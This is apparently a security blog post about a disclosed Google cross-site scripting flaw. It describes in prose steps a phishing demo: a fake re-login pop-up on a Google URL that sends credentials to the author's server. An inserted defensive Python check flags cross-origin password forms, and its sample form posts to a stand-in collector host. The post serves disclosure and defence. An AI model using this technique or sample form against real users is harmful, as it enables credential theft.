Yesterday we reported on how bug bounty programs can play unfair with hackers and researchers: hackers submit legitimate findings to companies and, no surprise, get replies like “Someone else already reported this, you are not eligible for a bounty”. But the main issue is this: if companies are really aware of the issue, why haven't they fixed it yet?
1.) A phishing page is created on Google, linked here.
2.) The user lands on a page whose address bar shows a URL of the form Google.com/______
3.) Using a cross-site scripting vulnerability, I generate a pop-up that convinces the Google user that their cookies have expired and that they have to log in again to access the next pages (please do not enter your real username / password).
4.) The phishing login form is built using a Google service itself and points to my EVIL server.
5.) Once the user tries to log in, all credentials are saved here and the page shows “Done” without any reload.
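As an added defender-side check, not code from the article, the following Python scans a page's HTML for password forms whose action resolves to an origin other than the page's own, which is the tell-tale of the form described in step 4. The sample page, hosts and form fields are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def origin(url: str) -> str:
    """scheme://host[:port] of a URL, lower-cased, for same-origin comparison."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()

class _FormCollector(HTMLParser):
    # Collects (action, has_password_field) for every <form> in the document.
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = [a.get("action") or "", False]
        elif tag == "input" and self._cur is not None:
            if (a.get("type") or "").lower() == "password":
                self._cur[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._cur is not None:
            self.forms.append(tuple(self._cur))
            self._cur = None

def foreign_credential_forms(page_url: str, html: str) -> list:
    """Resolved action URLs of password forms that submit to a different origin."""
    parser = _FormCollector()
    parser.feed(html)
    parser.close()
    page_origin = origin(page_url)
    hits = []
    for action, has_password in parser.forms:
        target = urljoin(page_url, action)  # empty/relative action stays on-origin
        if has_password and origin(target) != page_origin:
            hits.append(target)
    return hits

# Constructed sample (hypothetical hosts): a look-alike sign-in form posting
# elsewhere, beside a relative-action login form that must not be flagged.
SAMPLE_URL = "https://www.example.com/docs/view"
SAMPLE_HTML = """
<form action="https://evil.example.net/collect" method="post">
  <input name="Email"><input type="password" name="Passwd"><button>Sign in</button>
</form>
<form action="login"><input type="password" name="p"></form>
"""
```

Running `foreign_credential_forms(SAMPLE_URL, SAMPLE_HTML)` returns only the off-origin collector URL; a form with an empty or relative action is treated as same-origin.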
Update: A Google representative quickly replied about the issue and defended the company by saying that “It can’t be used for phishing” because it is hosted on a separate host name. Question from readers: can’t Google see that the URL in the browser is “Google.com/—–”, which is potentially enough for phishing?
By definition, phishing is tricking users into believing that they are on the right web page, and the demonstration successfully showed this.
Google also said that hosting this type of content on Google services violates their terms of service, but please note that we already followed the non-disclosure route two months ago, and that is enough time to take action and fix the bug. Disclosing the exploitation with a demo is now necessary to make them believe that it WORKS!!
Note for Google: Google can call it a “same origin policy” matter or a “violation of services”; for an attacker and a victim, your policies are nothing. Even the source of the PoC is not hosted on Google; we are calling it from our server, so we are not violating any of your policies. We respect you and are trying to help you understand the RISK, and to warn our readers to be aware of such phishing attacks.